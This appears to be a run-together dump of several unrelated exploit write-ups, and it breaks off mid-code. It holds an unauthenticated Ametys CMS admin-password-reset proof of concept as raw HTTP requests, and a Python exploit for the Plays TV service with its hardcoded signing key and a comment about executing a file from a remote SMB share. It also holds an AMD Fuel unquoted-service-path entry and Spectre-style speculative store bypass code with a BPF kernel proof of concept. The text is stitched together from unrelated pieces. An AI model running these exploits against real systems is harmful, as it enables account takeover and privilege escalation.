Ametys is “a free and open source content management system (CMS) written in Java. It is based on JSR-170 for content storage, Open Social for gadget rendering and a XML oriented framework.”
## Credit
An independent security researcher, Jose Luis, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
## Vendor response
Ametys has released patches to address this vulnerability – Ametys version 4.0.3
For more details: https://issues.ametys.org/browse/RUNTIME-2582
CVE-2017-16935
## Vulnerability details
User controlled input is not sufficiently sanitized. Unauthenticated user can perform administrative operations without properly authorization.
Ametys CMS only checks the authorization if the request includes /cms/ in the web request.
By that, we can reset any password of users, including administrator users
## Proof of Concept
By sending the following POST request, we can obtain the list of users:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core","responseType":"text","url":"users/search.json","p
arameters":{"contexts":["/sites/www","/sites-
fo/www"],"criteria":"","limit":100,"page":1,"start":0}}}}&context.parameters={}
```
The server then will response with:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:15 GMT
Connection: close
Content-Length: 1875
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="946">{"users":[{"firstname":"Simple","sortablename":"Contributor
Simple","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Simple
Contributor","login":"contrib","directory":"SQL
database","email":"contrib@example.com","lastname":"Contributor"},{"firstname":"User1","s
ortablename":"User1 User1","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User1 User1","login":"user1@ametys.org","directory":"SQL
database","email":"user1@ametys.org","lastname":"User1"},{"firstname":"User3","sortablena
me":"User3 User3","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User3 User3","login":"user3@ametys.org","directory":"SQL
database","email":"user3@ametys.org","lastname":"User3"},{"firstname":"Webmaster","sorta
blename":"User Webmaster","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Webmaster
User","login":"webmaster","directory":"SQL
database","email":"webmaster@example.com","lastname":"User"},{"firstname":"Manager","s
ortablename":"User Manager","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Manager
User","login":"manager","directory":"SQL
database","email":"manager@example.com","lastname":"User"},{"firstname":"Administrator"
,"sortablename":"User Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"},{"firstname":"User2","sortable
name":"User2 User2","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User2 User2","login":"user2@ametys.org","directory":"SQL
database","email":"user2@ametys.org","lastname":"User2"}]}</response></responses>
```
The value of the field “populationId” and “login”, we need these values for the next request
Now, we need perform another request to change the password of the admin user:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 345
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"text","url":"client-
call","parameters":{"role":"org.ametys.plugins.core.user.UserDAO","methodName":"editUser"
,"parameters":["ametys_demo_users",{"login":"admin","password":"MYNEWPASSWORD","fi
rstname":"Administrator","lastname":"User","email":"admin@example.com"}]}}}&context.par
ameters={}
```
Once we have performed the request, the response is:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:59 GMT
Connection: close
Content-Length: 374
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="110">{"firstname":"Administrator","sortablename":"User
Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"}</response></responses>
```
Now you can log in as Admin with password MYNEWPASSWORD
########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import json
import hashlib
def check_svc( path, data ):
#Setup request
request = urllib.request.Request(addr)
#add post data
try:
resp = urllib.request.urlopen(request, "data".encode("utf-8"))
return "[-] Not Raptr, Plays TV service"
except urllib.error.HTTPError as err:
error_message = err.read().decode("utf-8")
if error_message == 'Security failed - Missing hash or message[data]':
return "[+] Raptr, Plays TV service"
def post_req( path, data ):
secret_key = 'a%qs0t33QgiE6ut^0I&Y'
#Setup request
request = urllib.request.Request(addr)
json_data = json.dumps(data)
m = hashlib.md5()
hash_data = path + json_data + secret_key
m.update(hash_data.encode('utf8'))
hash_str = m.hexdigest()
#add post data
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
resp = urllib.request.urlopen(request, p_data)
return resp.read()
#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
"installer": cmd,
"appdata": cmd
}
#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)
#Exploit service
ret = post_req(path, data)
print(ret)
# Exploit Title: AMD Fuel Service - 'Fuel.service' Unquote Service Path
# Discovery by: Hector Gerbacio
# Discovery Date: 2021-02-05
# Vendor Homepage: https://www.amd.com/
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 con Bing
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "fuel.service" | findstr /i /v """
AMD FUEL Service AMD FUEL Service C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService Auto
# Service info:
C:\>sc qc "AMD FUEL Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AMD FUEL Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : AMD FUEL Service
DEPENDENCIAS : RpcSs
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
/*
======== Intro / Overview ========
After Michael Schwarz made some interesting observations, we started
looking into variants other than the three already-known ones.
I noticed that Intel's Optimization Manual says in
section 2.4.4.5 ("Memory Disambiguation"):
A load instruction micro-op may depend on a preceding store. Many
microarchitectures block loads until all preceding store address
are known.
The memory disambiguator predicts which loads will not depend on
any previous stores. When the disambiguator predicts that a load
does not have such a dependency, the load takes its data from the
L1 data cache.
Eventually, the prediction is verified. If an actual conflict is
detected, the load and all succeeding instructions are re-executed.
According to my experiments, this effect can be used to cause
speculative execution to continue far enough to execute a
Spectre-style gadget on a pointer read from a memory slot to which a
store has been speculatively ignored. I have tested this behavior on
the following processors from Intel and AMD:
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
- AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
I haven't yet tested this on any ARM CPU.
Interestingly, only on the Skylake laptop, it seems to work when
interrupts and SMP are disabled while the test is running; on the
other machines, it seems to only work when interrupts are enabled,
maybe because the kernel code cause some noise that garbles some
predictor state or so? Or just because they mess up timing
somewhere...
There were mentions of data speculation on the netdev list, in a
somewhat different context:
https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
However, I'm not entirely sure about the terminology. Do
"data speculation" and "value speculation" include speculating about
the *source* of data, or do they refer exclusively to directly
speculating about the *value* of data?
======== Demo code (no privilege boundaries crossed) ========
This is some code that purely demonstrates the basic effect and shows
that it is possible to combine it with a Meltdown/Spectre-style
gadget for leaking data into the cache. It does not cross any
privilege boundaries.
----------------------- START -----------------------
// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}
// optionally add: -DNO_INTERRUPTS
#include <stdio.h>
#include <sys/io.h>
#include <err.h>
#include <sys/mman.h>
#define pipeline_flush() asm volatile("mov $0,
%%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ :
"rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
// source of high-latency pointer to the memory slot
unsigned char **flushy_area[1000];
#define flushy (flushy_area+500)
// memory slot on which we want bad memory disambiguation
unsigned char *memory_slot_area[1000];
#define memory_slot (memory_slot_area+500)
// 0123456789abcdef
unsigned char secret_read_area[] = "0000011011101011";
unsigned char public_read_area[] = "################";
unsigned char timey_line_area[0x200000];
// stored in the memory slot first
#define timey_lines (timey_line_area + 0x10000)
unsigned char dummy_char_sink;
int testfun(int idx) {
pipeline_flush();
*flushy = memory_slot;
*memory_slot = secret_read_area;
timey_lines['0' << 12] = 1;
timey_lines['1' << 12] = 1;
pipeline_flush();
clflush(flushy);
clflush(&timey_lines['0' << 12]);
clflush(&timey_lines['1' << 12]);
asm volatile("mfence");
pipeline_flush();
// START OF CRITICAL PATH
unsigned char **memory_slot__slowptr = *flushy;
//pipeline_flush();
// the following store will be speculatively ignored since its
address is unknown
*memory_slot__slowptr = public_read_area;
// uncomment the instructions in the next line to break the attack
asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ :
/*in*/ : "rax","rbx","rcx","rdx","memory");
// architectual read from dummy_timey_line, possible
microarchitectural read from timey_line
dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];
// END OF CRITICAL PATH
unsigned int t1, t2;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '0')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_0 = t2 - t1;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '1')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_1 = t2 - t1;
if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {
pipeline_flush();
return 0;
}
if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {
pipeline_flush();
return 1;
}
pipeline_flush();
return -1;
}
int main(void) {
char out[100000];
char *out_ = out;
#ifdef NO_INTERRUPTS
if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))
err(1, "iopl(3)");
#endif
for (int idx = 0; idx < 16; idx++) {
#ifdef NO_INTERRUPTS
asm volatile("cli");
#endif
pipeline_flush();
long cycles = 0;
int hits = 0;
char results[33] = {0};
/* if we don't break the loop after some time when it doesn't
work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock
up */
while (hits < 32 && cycles < 1000000) {
pipeline_flush();
int res = testfun(idx);
if (res != -1) {
pipeline_flush();
results[hits] = res + '0';
hits++;
}
cycles++;
pipeline_flush();
}
pipeline_flush();
#ifdef NO_INTERRUPTS
asm volatile("sti");
#endif
out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n",
secret_read_area[idx], results, cycles, 100*hits/(double)cycles);
}
printf("%s", out);
pipeline_flush();
}
----------------------- END -----------------------
Results:
In the following, "SMP off" means that I have executed this
command:
# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done
For the Intel machines, "turbo off" means that I've executed the
following command:
# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
Skylake laptop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)
0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)
0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)
0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)
0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)
1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)
1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)
0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)
1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)
1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)
1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)
0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)
1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)
0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)
1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)
1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)
Skylake laptop, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)
0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)
0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)
1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)
1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)
1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
Haswell PC, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)
0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)
0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)
0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)
0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)
1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)
1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)
0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)
1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)
1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)
1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)
0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)
1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)
0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)
1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)
1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)
Haswell PC, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)
0: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
AMD desktop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99
$ ./test
0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)
0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)
0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)
0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)
0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)
1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)
1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)
0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)
1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)
1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)
1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)
0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)
1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)
0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)
1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)
1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)
AMD desktop, SMP off, interrupts off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS
$ sudo ./test
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
======== assisted BPF PoC ========
This is a PoC that demonstrates that this issue can potentially be
used to attack the Linux kernel's BPF subsystem.
This is *NOT* a full exploit against BPF; this is a PoC that requires
kernel patches that permit the PoC to flush kernel memory from inside
BPF and to measure access times to BPF arrays. It seems probable that
these restrictions could be overcome, but my PoC doesn't do that.
The basic idea here is to cause a speculative type confusion:
1. Store a number N at address A on the stack.
2. Write a pointer P to address A, using a high-latency
expression to compute A.
3. Read a value X from address A, with A specified using a low-latency
expression. Architecturally, X is P; however, microarchitecturally,
X can be N.
4. Use the Spectre/Meltdown gadget to leak the value X points to into
the cache.
The attack benefits from the unique property of eBPF that the engine
performs relatively complicated value tracking, but does not
normally use the resulting information to modify the code in any way
(e.g. by optimizing things away). It is not clear how applicable this
attack would be to e.g. other scripting languages, or whether it is an
issue for non-scripting code.
I have only tested this PoC on an Intel Skylake CPU.
Kernel patch required for the PoC to work (copy attached, so that it
applies cleanly), to be applied to the 4.15.1 stable kernel:
----------------------- START -----------------------
diff --git a/include/linux/bpf.h b/include/linux/bpf.h
index 0b25cf87b6d6..896b4f483fe2 100644
--- a/include/linux/bpf.h
+++ b/include/linux/bpf.h
@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;
extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;
extern const struct bpf_func_proto bpf_get_stackid_proto;
extern const struct bpf_func_proto bpf_sock_map_update_proto;
+extern const struct bpf_func_proto bpf_clflush_mfence_proto;
/* Shared helpers among cBPF and eBPF. */
void bpf_user_rnd_init_once(void);
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
index 3d24e238221e..379dc888cb81 100644
--- a/kernel/bpf/helpers.c
+++ b/kernel/bpf/helpers.c
@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {
.arg1_type = ARG_PTR_TO_UNINIT_MEM,
.arg2_type = ARG_CONST_SIZE,
};
+
+BPF_CALL_1(bpf_clflush_mfence, void *, target) {
+ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory");
+ return 0;
+}
+
+const struct bpf_func_proto bpf_clflush_mfence_proto = {
+ .func = bpf_clflush_mfence,
+ .ret_type = RET_INTEGER,
+ /* theoretically permits CLFLUSH on invalid addresses,
+ * but the PoC doesn't do that
+ */
+ .arg1_type = ARG_DONTCARE
+};
diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
index 5cb783fc8224..2dd9a2a95630 100644
--- a/kernel/bpf/syscall.c
+++ b/kernel/bpf/syscall.c
@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)
return err;
}
+static int map_time_flush_loc(union bpf_attr *attr)
+{
+ void __user *ukey = u64_to_user_ptr(attr->key);
+ void __user *uvalue = u64_to_user_ptr(attr->value);
+ int ufd = attr->map_fd;
+ struct bpf_map *map;
+ void *key, *ptr;
+ struct fd f;
+ int err = 0;
+ u64 delay = 0;
+
+ f = fdget(ufd);
+ map = __bpf_map_get(f);
+ if (IS_ERR(map))
+ return PTR_ERR(map);
+
+ if (!(f.file->f_mode & FMODE_CAN_READ)) {
+ err = -EPERM;
+ goto err_put;
+ }
+
+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {
+ err = -EINVAL;
+ goto err_put;
+ }
+
+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {
+ err = -EINVAL;
+ goto err_put;
+ }
+ asm volatile("lfence");
+
+ key = memdup_user(ukey, map->key_size);
+ if (IS_ERR(key)) {
+ err = PTR_ERR(key);
+ goto err_put;
+ }
+
+ rcu_read_lock();
+ ptr = map->ops->map_lookup_elem(map, key);
+ if (ptr) {
+ unsigned int t1, t2;
+ ptr = (char*)ptr + attr->flags;
+ asm volatile(
+ "xor %%r11, %%r11\n\t"
+ "lfence\n\t"
+ "rdtscp\n\t"
+ "mov %%eax, %%ebx\n\t"
+ "mov (%%rdi), %%r11b\n\t"
+ "rdtscp\n\t"
+ "mfence\n\t"
+ "clflush (%%rdi)\n\t"
+ "mfence\n\t"
+ ://out
+ "=a"(t2),
+ "=b"(t1)
+ ://in
+ "D"(ptr)
+ ://clobber
+ "r11",
+ "rcx",
+ "rdx",
+ "memory"
+ );
+ delay = t2 - t1;
+ }
+ rcu_read_unlock();
+ if (copy_to_user(uvalue, &delay, 8)) {
+ err = -EINVAL;
+ goto free_key;
+ }
+
+free_key:
+ kfree(key);
+err_put:
+ fdput(f);
+ return err;
+}
+
#define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags
static int map_update_elem(union bpf_attr *attr)
@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr
__user *, uattr, unsigned int, siz
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
break;
+ case 0x13370001:
+ err = map_time_flush_loc(&attr);
+ break;
case BPF_MAP_DELETE_ELEM:
err = map_delete_elem(&attr);
break;
diff --git a/net/core/filter.c b/net/core/filter.c
index 1c0eb436671f..e310a345054c 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)
return &bpf_tail_call_proto;
case BPF_FUNC_ktime_get_ns:
return &bpf_ktime_get_ns_proto;
+ case 4:
+ return &bpf_clflush_mfence_proto;
case BPF_FUNC_trace_printk:
if (capable(CAP_SYS_ADMIN))
return bpf_get_trace_printk_proto();
----------------------- END -----------------------
The PoC:
----------------------- START -----------------------
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <assert.h>
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/user.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
